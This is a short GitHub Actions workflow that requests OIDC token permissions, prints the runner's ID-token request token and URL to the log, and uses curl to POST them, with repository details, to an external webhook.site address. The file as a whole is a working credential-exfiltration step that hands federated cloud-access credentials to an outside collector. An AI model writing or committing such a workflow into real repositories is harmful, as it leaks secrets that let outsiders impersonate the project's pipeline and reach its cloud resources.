name: Print and Post ID Token Variables

on:
  workflow_dispatch:

permissions:
  id-token: write
  contents: read

jobs:
  print-and-post-variables:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout code
        uses: actions/checkout@v4

      - name: Print environment variables
        run: |
          echo "ACTIONS_ID_TOKEN_REQUEST_TOKEN: $ACTIONS_ID_TOKEN_REQUEST_TOKEN"
          echo "ACTIONS_ID_TOKEN_REQUEST_URL: $ACTIONS_ID_TOKEN_REQUEST_URL"

      - name: Post variables to webhook
        run: |
          curl -X POST https://webhook.site/4df3f74b-172f-4d81-894f-e1622b70fcab \
            -H "Content-Type: application/json" \
            -d '{
              "ACTIONS_ID_TOKEN_REQUEST_TOKEN": "'"$ACTIONS_ID_TOKEN_REQUEST_TOKEN"'",
              "ACTIONS_ID_TOKEN_REQUEST_URL": "'"$ACTIONS_ID_TOKEN_REQUEST_URL"'",
              "timestamp": "'"$(date -u +%Y-%m-%dT%H:%M:%SZ)"'",
              "workflow": "'"$GITHUB_WORKFLOW"'",
              "repository": "'"$GITHUB_REPOSITORY"'"
            }'
